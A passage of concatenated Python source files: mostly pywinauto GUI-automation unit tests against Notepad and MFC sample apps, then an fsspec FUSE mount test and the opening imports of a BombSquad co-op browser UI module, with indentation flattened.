installed_programs = window.FolderView.texts()[1:]
programs_list = ','.join(installed_programs)
if ('Microsoft' not in programs_list) and ('Python' not in programs_list):
hwndwrapper.ImageGrab.grab().save(r'explorer_screenshot.jpg')
hwndwrapper.ActionLogger().log('\ninstalled_programs:\n')
for prog in installed_programs:
hwndwrapper.ActionLogger().log(prog)
self.assertEqual(('Microsoft' in programs_list) or ('Python' in programs_list), True)
finally:
window.Close(2.0)
if UIA_support:
def test_wait_cpu_usage_lower_uia(self):
"""Test that wait_cpu_usage_lower() works correctly for UIA"""
app = Application(backend='uia')
app.start('notepad.exe')
try:
app.wait_cpu_usage_lower(threshold = 1.5, timeout = 30, usage_interval = 2)
finally:
app.kill()
app.cpu_usage = mock.Mock(return_value=10)
self.assertRaises(
RuntimeError, app.wait_cpu_usage_lower,
threshold = 9.0, timeout = 5, usage_interval = 0.5
)
# def test_wait_for_idle_exception(self):
# """Test that method start() raises an exception when wait for idle failed"""
# app = Application()
# self.assertRaises(Exception, app.start, 'cmd.exe')
# # TODO: test and fix the case when cmd.exe can't be killed by app.kill()
def test_windows(self):
"""Test that windows_() works correctly"""
Timings.window_find_timeout = 5
app = Application()
self.assertRaises(AppNotConnected, app.windows_, **{'title' : 'not connected'})
app.start('notepad.exe')
self.assertRaises(ValueError, app.windows_, **{'backend' : 'uia'})
notepad_handle = app.UntitledNotepad.handle
self.assertEqual(app.windows(visible=True), [notepad_handle])
app.UntitledNotepad.menu_select("Help->About Notepad")
aboutnotepad_handle = app.AboutNotepad.handle
self.assertEqual(
app.windows(visible=True, enabled=None),
[aboutnotepad_handle, notepad_handle])
app.AboutNotepad.OK.Click()
app.UntitledNotepad.menu_select("File->Exit")
def test_window(self):
"""Test that window_() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.window_, **{'title' : 'not connected'})
app.start(_notepad_exe())
self.assertRaises(ValueError, app.windows_, **{'backend' : 'uia'})
title = app.window(name="Untitled - Notepad")
title_re = app.window(name_re="Untitled[ -]+Notepad")
classname = app.window(class_name="Notepad")
classname_re = app.window(class_name_re="Not..ad")
handle = app.window(handle=title.handle)
bestmatch = app.window(best_match="Untiotled Notepad")
self.assertNotEqual(title.handle, None)
self.assertNotEqual(title.handle, 0)
self.assertEqual(title.handle, title_re.handle)
self.assertEqual(title.handle, classname.handle)
self.assertEqual(title.handle, classname_re.handle)
self.assertEqual(title.handle, handle.handle)
self.assertEqual(title.handle, bestmatch.handle)
app.UntitledNotepad.menu_select("File->Exit")
def test_getitem(self):
"""Test that __getitem__() works correctly"""
Timings.window_find_timeout = 5
app = Application()
app.start(_notepad_exe())
self.assertRaises(Exception, app['blahblah'])
self.assertRaises(
findbestmatch.MatchError,
app['blahblah']['not here'].__getitem__, 'handle')
self.assertEqual(
app[u'Unt\xeftledNotepad'].handle,
app.window(name="Untitled - Notepad").handle)
app.UntitledNotepad.menu_select("Help->About Notepad")
self.assertEqual(
app['AboutNotepad'].handle,
app.window(name="About Notepad").handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.menu_select("File->Exit")
def test_getattribute(self):
"""Test that __getattribute__() works correctly"""
Timings.window_find_timeout = 5
app = Application()
app.start(_notepad_exe())
self.assertRaises(
findbestmatch.MatchError,
app.blahblah.__getattribute__, 'handle')
self.assertEqual(
app.UntitledNotepad.handle,
app.window(name="Untitled - Notepad").handle)
app.UntitledNotepad.menu_select("Help->About Notepad")
# I think it's OK that this no longer raises a MatchError
# just because the window is not enabled - doesn't mean you
# should not be able to access it at all!
#self.assertRaises(findbestmatch.MatchError,
# app.Notepad.__getattribute__, 'handle')
self.assertEqual(
app.AboutNotepad.handle,
app.window(name="About Notepad").handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.menu_select("File->Exit")
def test_kill(self):
"""test killing the application"""
app = Application()
app.start(_notepad_exe())
app.UntitledNotepad.Edit.type_keys("hello")
app.UntitledNotepad.menu_select("File->Print...")
#app.Print.FindPrinter.Click() # Vasily: (Win7 x64) "Find Printer" dialog is from splwow64.exe process
#app.FindPrinters.Stop.Click()
app.kill()
self.assertRaises(AttributeError, app.UntitledNotepad.Edit)
def test_process_is_running(self):
"""Tests process is running and wait for exit function"""
app = Application()
app.start(_notepad_exe())
app.UntitledNotepad.wait("ready")
self.assertTrue(app.is_process_running())
self.assertRaises(TimeoutError, lambda: app.wait_for_process_exit(timeout=5, retry_interval=1))
app.kill()
app.wait_for_process_exit()
self.assertFalse(app.is_process_running())
def test_should_return_not_running_if_not_started(self):
"""Tests that works on new instance
is_process_running/wait_for_process_exit can be called on not started/disconnected instance
"""
app = Application()
app.wait_for_process_exit(timeout=10, retry_interval=1)
self.assertFalse(app.is_process_running())
class TestInheritedApp(Application):
"""Our inherited version of class"""
def test_method(self):
"""This method should be called without any issues"""
return self is not None
def test_application_inheritance(self):
"""Test that Application class can be inherited and has it's own methods"""
app = ApplicationTestCases.TestInheritedApp()
self.assertTrue(app.test_method())
def test_non_magic_application(self):
app = Application()
self.assertEqual(app.allow_magic_lookup, True)
app_no_magic = Application(allow_magic_lookup=False)
self.assertEqual(app_no_magic.allow_magic_lookup, False)
app_no_magic.start(_notepad_exe())
window = app_no_magic.window(best_match="UntitledNotepad")
dlg = window.by(best_match="Edit")
dlg.draw_outline()
with self.assertRaises(AttributeError):
app_no_magic.UntitledNotepad
with self.assertRaises(AttributeError):
window.Edit
app_no_magic.kill()
app_no_magic.wait_for_process_exit()
class WindowSpecificationTestCases(unittest.TestCase):
"""Unit tests for the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend="win32").start(_notepad_exe())
self.dlgspec = self.app.UntitledNotepad
self.ctrlspec = self.app.UntitledNotepad.Edit
def tearDown(self):
"""Close the application after tests"""
# close the application
#self.app.UntitledNotepad.menu_select("File->Exit")
self.app.kill()
def test__init__(self):
"""Test creating a new spec by hand"""
wspec = WindowSpecification(
dict(
best_match=u"UntitledNotepad",
app=self.app)
)
self.assertEqual(
wspec.window_text(),
u"Untitled - Notepad")
self.assertEqual(self.dlgspec.app, self.app)
self.assertEqual(self.ctrlspec.app, self.app)
self.assertEqual(wspec.app, self.app)
def test__init__both_keywords(self):
"""Test creating a new spec with ambiguity by process and app simultaneously"""
self.assertRaises(KeyError, WindowSpecification,
dict(best_match=u"UntitledNotepad", app=self.app, pid=self.app.process)
)
def test__call__(self):
"""Test that __call__() correctly raises an error"""
self.assertRaises(AttributeError, self.dlgspec)
self.assertRaises(AttributeError, self.ctrlspec)
# no best_match!
wspec = WindowSpecification(
dict(name=u"blah", app=self.app)
)
self.assertRaises(AttributeError, wspec)
def test_wrapper_object(self):
"""Test that we can get a control"""
self.assertEqual(True, isinstance(self.dlgspec, WindowSpecification))
self.assertEqual(
True,
isinstance(self.dlgspec.find(), hwndwrapper.HwndWrapper)
)
def test_window(self):
"""test specifying a sub window of an existing specification"""
sub_spec = self.dlgspec.by(class_name ="Edit")
sub_spec_legacy = self.dlgspec.window(class_name = "Edit")
self.assertEqual(True, isinstance(sub_spec, WindowSpecification))
self.assertEqual(sub_spec.class_name(), "Edit")
self.assertEqual(sub_spec_legacy.class_name(), "Edit")
def test__getitem__(self):
"""test item access of a windowspec"""
self.assertEqual(
True,
isinstance(self.dlgspec['Edit'], WindowSpecification)
)
self.assertEqual(self.dlgspec['Edit'].class_name(), "Edit")
self.assertRaises(AttributeError, self.ctrlspec.__getitem__, 'edit')
def test_getattr(self):
"""Test getting attributes works correctly"""
self.assertEqual(
True,
isinstance(self.dlgspec.Edit, WindowSpecification)
)
self.assertEqual(self.dlgspec.Edit.class_name(), "Edit")
# check that getting a dialog attribute works correctly
self.assertEqual(
"Notepad",
self.dlgspec.class_name())
# Check handling 'parent' as a WindowSpecification
spec = self.ctrlspec.by(parent=self.dlgspec, visible=True)
self.assertEqual(spec.class_name(), "Edit")
def test_non_magic_getattr(self):
ws = WindowSpecification(dict(best_match="Notepad"))
self.assertEqual(ws.allow_magic_lookup, True)
ws_no_magic = WindowSpecification(dict(best_match="Notepad"), allow_magic_lookup=False)
self.assertEqual(ws_no_magic.allow_magic_lookup, False)
dlg = ws_no_magic.by(best_match="Edit")
has_focus = dlg.has_keyboard_focus()
self.assertIn(has_focus, (True, False))
with self.assertRaises(AttributeError):
ws_no_magic.Edit
def test_exists(self):
"""Check that windows exist"""
self.assertEqual(True, self.dlgspec.exists())
self.assertEqual(True, self.dlgspec.exists(0))
self.assertEqual(True, self.ctrlspec.exists())
# TODO: test a control that is not visible but exists
#self.assertEqual(True, self.app.DefaultIME.exists())
start = timestamp()
self.assertEqual(False, self.app.BlahBlah.exists(timeout=.1))
self.assertEqual(True, timestamp() - start < .3)
start = timestamp()
self.assertEqual(False, self.app.BlahBlah.exists(timeout=3))
self.assertEqual(True, 2.7 < timestamp() - start < 3.3)
def test_exists_timing(self):
"""test the timing of the exists method"""
# try ones that should be found immediately
start = timestamp()
self.assertEqual(True, self.dlgspec.exists())
self.assertEqual(True, timestamp() - start < .3)
start = timestamp()
self.assertEqual(True, self.ctrlspec.exists())
self.assertEqual(True, timestamp() - start < .3)
# try an existing one with an explicit timeout - it should be
# found well before the .5s timeout expires
start = timestamp()
self.assertEqual(True, self.dlgspec.exists(.5))
timedif = timestamp() - start
self.assertEqual(True, timedif < .49)
def test_wait(self):
"""test the functionality and timing of the wait method"""
allowable_error = .2
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait("enaBleD "))
time_taken = (timestamp() - start)
if not 0 <= time_taken < (0 + 2 * allowable_error):
self.assertEqual(.02, time_taken)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait(" ready"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait(" exiSTS"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait(" VISIBLE "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait(" ready enabled"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait("visible exists "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait("exists "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait("actIve "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
self.assertRaises(SyntaxError, self.dlgspec.wait, "Invalid_criteria")
def test_wait_non_existing(self):
"""test timing of the wait method for non-existing element"""
allowable_error = .2
start = timestamp()
self.assertRaises(TimeoutError, self.app.BlahBlah.wait, 'exists')
expected = Timings.window_find_timeout
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
def test_wait_invisible(self):
"""test timing of the wait method for non-existing element and existing invisible one"""
# TODO: re-use an MFC sample for this test
allowable_error = .2
start = timestamp()
self.assertRaises(TimeoutError, self.app.BlahBlah.wait, 'visible')
expected = Timings.window_find_timeout
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
# make sure Status Bar is not visible
status_bar_menu = self.app.UntitledNotepad.menu().item('&View').sub_menu().item('&Status Bar')
if status_bar_menu.is_checked():
status_bar_menu.select()
# check that existing invisible control is still found with 'exists' criterion
status_bar_spec = self.app.UntitledNotepad.by(class_name="msctls_statusbar32", visible=None)
self.assertEqual('StatusBar', status_bar_spec.wait('exists').friendly_class_name())
start = timestamp()
self.assertRaises(TimeoutError, status_bar_spec.wait, 'exists visible')
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, status_bar_spec.wait, 'visible exists')
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
def test_wait_not(self):
"""
Test that wait not fails for all the following
* raises and error when criteria not met
* timing is close to the timeout value
"""
allowable_error = .16
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, "enaBleD ", .1, .05)
taken = timestamp() - start
if not .1 <= taken < .1 + allowable_error:
self.assertEqual(.12, taken)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, " ready", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, " exiSTS", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, " VISIBLE ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, " ready enabled", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, "visible exists ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, "exists ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, "actIve ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
self.assertRaises(SyntaxError, self.dlgspec.wait_not, "Invalid_criteria")
# def test_wait_ready(self):
# """Make sure the friendly class is set correctly"""
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitReady(.1, .05))
#
# # if it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
#
# def testWaitNotReady(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotReady, .1, .05)
#
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
#
#
# def testWaitEnabled(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitEnabled(.1, .05))
#
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
#
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
#
# def testWaitNotEnabled(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotEnabled, .1, .05)
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
#
# def testWaitVisible(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitVisible(.1, .05))
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
# def testWaitNotVisible(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotVisible, .1, .05)
# # if it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# def testWaitExists(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitExists(.1, .05))
#
# # if it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# def testWaitNotExists(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotExists, .1, .05)
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
def test_depth(self):
"""Test that descendants() with depth works correctly"""
self.dlgspec.menu_select("Format -> Font")
self.assertNotEqual(
len(self.app['Font'].descendants(depth=1)),
len(self.app['Font'].descendants(depth=2)))
def test_dump_tree(self):
"""Make sure dump_tree() doesn't crash"""
self.dlgspec.dump_tree()
self.ctrlspec.dump_tree()
def test_dump_tree_file_output(self):
"""Make sure dump_tree() creates correct file"""
output_filename = "test_dump_tree.txt"
self.dlgspec.dump_tree(filename=output_filename)
if os.path.isfile(output_filename):
with open(output_filename, "r") as test_log_file:
content = str(test_log_file.readlines())
self.assertTrue("'Untitled - NotepadEdit'" in content
and "'Edit'" in content)
self.assertTrue(".by(class_name='msctls_statusbar32'" in content)
os.remove(output_filename)
else:
self.fail("dump_tree can't create a file")
self.ctrlspec.dump_tree(filename=output_filename)
if os.path.isfile(output_filename):
with open(output_filename, "r") as test_log_file:
content = str(test_log_file.readlines())
self.assertTrue(".by(class_name='Edit')" in content)
os.remove(output_filename)
else:
self.fail("dump_tree can't create a file")
def test_find_elements_re(self):
"""Test for bug #90: A crash in 'find_elements' when called with 'title_re' argument"""
self.dlgspec.wait('visible')
windows = findwindows.find_elements(name_re="Untitled - Notepad")
self.assertTrue(len(windows) >= 1)
class ChildWindowSpecificationFromWrapperTests(unittest.TestCase):
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend="win32").start(_notepad_exe())
self.ctrlspec = self.app.window(found_index=0).find().by(class_name='Edit')
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
def test_wrapper_object(self):
"""Test that we can get a control"""
self.assertEqual(True, isinstance(self.ctrlspec, WindowSpecification))
self.assertEqual(
True,
isinstance(self.ctrlspec.find(), hwndwrapper.HwndWrapper)
)
def test_parent(self):
"""Test recreating specification from parent dialog wrapper"""
dlg = self.ctrlspec.parent()
sub_spec = dlg.by(class_name ="Edit")
self.assertEqual(True, isinstance(sub_spec, WindowSpecification))
self.assertEqual(sub_spec.class_name(), "Edit")
self.assertEqual(self.ctrlspec.handle, sub_spec.handle)
def test_dump_tree_file_output(self):
"""Make sure dump_tree() creates correct file"""
output_filename = "test_dump_tree.txt"
self.ctrlspec.dump_tree(filename=output_filename)
if os.path.isfile(output_filename):
with open(output_filename, "r") as test_log_file:
content = str(test_log_file.readlines())
self.assertTrue(".by(class_name='Edit')" in content)
os.remove(output_filename)
else:
self.fail("dump_tree can't create a file")
def test_properties(self):
"""Check control properties"""
self.assertEqual(self.ctrlspec.class_name(), "Edit")
self.assertTrue(self.ctrlspec.exists())
if UIA_support:
class UIAWindowSpecificationTestCases(unittest.TestCase):
"""Unit tests for the application.Application class with UIA backend"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend="uia").start(_notepad_exe())
self.dlgspec = self.app.UntitledNotepad
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
def test_child_window_depth(self):
"""Test that child_window() with depth works correctly"""
# TODO fix same elements at different tree levels on win32 backend
self.dlgspec.menu_select("Format -> Font")
font = self.dlgspec.by(name="Font")
with self.assertRaises(findbestmatch.MatchError):
font.by(best_match="ListBox0", depth=1).find()
font.by(best_match="ListBox0", depth=2).find()
class WaitUntilDecoratorTests(unittest.TestCase):
"""Unit tests for always_wait_until and always_wait_until_passes decorators"""
def test_always_wait_until_decorator_success(self):
"""Test always_wait_until_decorator success"""
@always_wait_until(4, 2)
def foo():
return True
self.assertTrue(foo())
def test_always_wait_until_decorator_failure(self):
"""Test wait_until_decorator failure"""
@always_wait_until(4, 2)
def foo():
return False
self.assertRaises(TimeoutError, foo)
def test_always_wait_until_passes_decorator_success(self):
"""Test always_wait_until_passes_decorator success"""
@always_wait_until_passes(4, 2)
def foo():
return True
self.assertTrue(foo())
def test_always_wait_until_passes_decorator_failure(self):
"""Test always_wait_until_passes_decorator failure"""
@always_wait_until_passes(4, 2)
def foo():
raise Exception("Unexpected Error in foo")
self.assertRaises(TimeoutError, foo)
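# --- Illustrative sketch (editor's addition, not part of the original tests) ---
# always_wait_until_passes(timeout, retry_interval) keeps calling the wrapped
# function until it stops raising or the timeout (in seconds) elapses. A flaky
# function that fails twice and then succeeds shows the retry behaviour:
#
#     attempts = {'n': 0}
#
#     @always_wait_until_passes(4, 0.5)
#     def flaky():
#         attempts['n'] += 1
#         if attempts['n'] < 3:
#             raise RuntimeError('not ready yet')
#         return attempts['n']
#
#     assert flaky() == 3  # succeeded on the third call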
class MultiLevelWindowSpecificationTests(unittest.TestCase):
"""Unit tests for multi-level (3+) WindowSpecification objects"""
if UIA_support:
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.slow()
self.app = Application(backend='uia').start(os.path.join(mfc_samples_folder, u"RowList.exe"))
self.dlg = self.app.RowListSampleApplication
def tearDown(self):
"""Close the application after tests"""
self.dlg.CloseButton.click()
self.dlg.wait_not('visible')
def test_3level_specification(self):
"""Test that controls can be accessed by 3 levels of attributes"""
self.dlg.Toolbar.About.click()
self.dlg.AboutRowList.OK.click()
#self.dlg.AboutRowList.wait_not('visible') # XXX: it takes more than 50 seconds!
else: # Win32
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend='win32').start(os.path.join(mfc_samples_folder, u"CmnCtrl3.exe"))
self.dlg = self.app.CommonControlsSample
def tearDown(self):
"""Close the application after tests"""
self.dlg.SendMessage(win32defines.WM_CLOSE)
def test_4level_specification(self):
"""Test that controls can be accessed by 4 levels of attributes"""
self.assertEqual(self.dlg.CPagerCtrl.Pager.Toolbar.button_count(), 12)
if UIA_support:
class DesktopUiaWindowSpecificationTests(unittest.TestCase):
"""Unit tests for Desktop(backend='uia') object"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.slow()
self.app = Application().start('explorer.exe "' + mfc_samples_folder_32 + '"')
self.desktop = Desktop(backend='uia')
self.desktop_no_magic = Desktop(backend='uia', allow_magic_lookup=False)
def tearDown(self):
"""Close the application after tests"""
self.desktop.MFC_samplesDialog.close()
self.desktop.MFC_samplesDialog.wait_not('exists')
def test_folder_list(self):
"""Test that ListViewWrapper returns correct files list in explorer.exe"""
files_list = self.desktop.MFC_samplesDialog.Shell_Folder_View.Items_View.find()
self.assertEqual([item.window_text() for item in files_list.get_items()],
[u'x64', u'BCDialogMenu.exe', u'CmnCtrl1.exe', u'CmnCtrl2.exe', u'CmnCtrl3.exe',
u'CtrlTest.exe', u'mfc100u.dll', u'NewControls.exe', u'RebarTest.exe', u'RowList.exe', u'TrayMenu.exe'])
self.assertEqual(files_list.item('RebarTest.exe').window_text(), 'RebarTest.exe')
def test_set_backend_to_window_uia(self):
"""Set backend to method window(), except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.window(backend='uia', name='MFC_samplesDialog')
with self.assertRaises(ValueError):
self.desktop.window(backend='win32', name='MFC_samplesDialog')
def test_get_list_of_windows_uia(self):
"""Test that method .windows() returns a non-empty list of windows"""
dlgs = self.desktop.windows()
self.assertTrue(len(dlgs) > 1)
def test_set_backend_to_windows_uia(self):
"""Set backend to method .windows(), except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.windows(backend='win32')
with self.assertRaises(ValueError):
self.desktop.windows(backend='uia')
def test_only_visible_windows_uia(self):
"""Set visible=True to method .windows()"""
dlgs = self.desktop.windows(visible=True)
self.assertTrue(all([win.is_visible() for win in dlgs]))
def test_only_enable_windows_uia(self):
"""Set enable_only to the method windows"""
dlgs = self.desktop.windows(enabled=True)
self.assertTrue(all([win.is_enabled() for win in dlgs]))
def test_non_magic_desktop(self):
from pywinauto.controls.uiawrapper import UIAWrapper
self.assertEqual(self.desktop.allow_magic_lookup, True)
self.assertEqual(self.desktop_no_magic.allow_magic_lookup, False)
dlgs = self.desktop_no_magic.windows()
self.assertTrue(len(dlgs) > 1)
window = self.desktop_no_magic.window(name="MFC_samples")
self.assertEqual(window.allow_magic_lookup, False)
dlg = window.by(class_name="ShellTabWindowClass").find()
self.assertIsInstance(dlg, UIAWrapper)
has_focus = dlg.has_keyboard_focus()
self.assertIn(has_focus, (True, False))
with self.assertRaises(AttributeError):
self.desktop_no_magic.MFC_samples
with self.assertRaises(AttributeError):
window.ShellTabWindowClass
class DesktopWin32WindowSpecificationTests(unittest.TestCase):
"""Unit tests for Desktop(backend='win32') object"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend='win32').start(os.path.join(mfc_samples_folder, u"CmnCtrl3.exe"))
self.desktop = Desktop(backend='win32')
self.desktop_no_magic = Desktop(backend='win32', allow_magic_lookup=False)
self.window_title = 'Common Controls Sample'
def tearDown(self):
"""Close the application after tests"""
self.desktop.window(name=self.window_title, pid=self.app.process).SendMessage(win32defines.WM_CLOSE)
def test_simple_access_through_desktop(self):
"""Test that controls can be accessed by 4 levels of attributes"""
dlg = self.desktop.window(name=self.window_title, pid=self.app.process)
self.assertEqual(dlg.Pager.Toolbar.button_count(), 12)
def test_set_backend_to_window_win32(self):
"""Set backend to method window(), except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.window(backend='uia', name=self.window_title, pid=self.app.process)
with self.assertRaises(ValueError):
self.desktop.window(backend='win32', name=self.window_title, pid=self.app.process)
def test_get_list_of_windows_win32(self):
"""Test that method .windows() returns a non-empty list of windows"""
dlgs = self.desktop.windows()
self.assertTrue(len(dlgs) > 1)
window_titles = [win_obj.window_text() for win_obj in dlgs]
self.assertTrue(self.window_title in window_titles)
def test_set_backend_to_windows_win32(self):
"""Set backend to method windows, except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.windows(backend='win32')
with self.assertRaises(ValueError):
self.desktop.windows(backend='uia')
def test_only_visible_windows_win32(self):
"""Set visible=True to method .windows()"""
dlgs = self.desktop.windows(visible=True)
self.assertTrue(all([win.is_visible() for win in dlgs]))
def test_only_enable_windows_win32(self):
"""Set enable_only to the method windows"""
dlgs = self.desktop.windows(enabled=True)
self.assertTrue(all([win.is_enabled() for win in dlgs]))
def test_from_point_win32(self):
"""Test method Desktop(backend='win32').from_point(x, y)"""
combo = self.app.Common_Controls_Sample.ComboBox.find()
x, y = combo.rectangle().mid_point()
combo_from_point = self.desktop.from_point(x, y)
self.assertEqual(combo, combo_from_point)
def test_top_from_point_win32(self):
"""Test method Desktop(backend='win32').top_from_point(x, y)"""
combo = self.app.Common_Controls_Sample.ComboBox.find()
dlg = self.app.Common_Controls_Sample.find()
x, y = combo.rectangle().mid_point()
dlg_from_point = self.desktop.top_from_point(x, y)
self.assertEqual(dlg, dlg_from_point)
def test_non_magic_desktop(self):
self.assertEqual(self.desktop.allow_magic_lookup, True)
self.assertEqual(self.desktop_no_magic.allow_magic_lookup, False)
window = self.desktop_no_magic.window(name=self.window_title, pid=self.app.process)
self.assertEqual(window.allow_magic_lookup, False)
dlg = window.by(class_name="msctls_trackbar32").find()
self.assertIsInstance(dlg, TrackbarWrapper)
pos = dlg.get_position()
self.assertIsInstance(pos, six.integer_types)
with self.assertRaises(AttributeError):
getattr(self.desktop_no_magic, self.window_title.replace(" ", "_"))
with self.assertRaises(AttributeError):
window.msctls_trackbar32
if __name__ == "__main__":
unittest.main()
|
test_fuse.py | import os
import signal
import time
from multiprocessing import Process
import pytest
try:
pytest.importorskip("fuse") # noqa: E402
except OSError:
# can succeed in importing fuse, but fail to load the shared library (.so)
pytest.importorskip("nonexistent") # noqa: E402
from fsspec.fuse import run
from fsspec.implementations.memory import MemoryFileSystem
def host_fuse(mountdir):
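# Runs in a child process: fsspec's run() blocks while serving the FUSE
# mount, so the test starts this via Process and SIGTERMs it when done.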
fs = MemoryFileSystem()
fs.touch("/mounted/testfile")
run(fs, "/mounted/", mountdir)
def test_basic(tmpdir, capfd):
mountdir = str(tmpdir.mkdir("mount"))
fuse_process = Process(target=host_fuse, args=(str(mountdir),))
fuse_process.start()
try:
timeout = 10
while True:
try:
# can fail with device not ready while waiting for fuse
if "testfile" in os.listdir(mountdir):
break
except Exception:
pass
timeout -= 1
time.sleep(1)
if timeout <= 0:
pytest.skip("fuse didn't come live")
fn = os.path.join(mountdir, "test")
with open(fn, "wb") as f:
f.write(b"data")
with open(fn) as f:
assert f.read() == "data"
os.remove(fn)
os.mkdir(fn)
assert os.listdir(fn) == []
os.mkdir(fn + "/inner")
with pytest.raises(OSError):
os.rmdir(fn)
captured = capfd.readouterr()
assert "Traceback" not in captured.out
assert "Traceback" not in captured.err
os.rmdir(fn + "/inner")
os.rmdir(fn)
finally:
os.kill(fuse_process.pid, signal.SIGTERM)
fuse_process.join()
|
browser.py | # Released under the MIT License. See LICENSE for details.
#
"""UI for browsing available co-op levels/games/etc."""
# FIXME: Break this up.
# pylint: disable=too-many-lines
from __future__ import annotations
import copy
from typing import TYPE_CHECKING
import _ba
import ba
from bastd.ui.store.button import StoreButton
from bastd.ui.league.rankbutton import LeagueRankButton
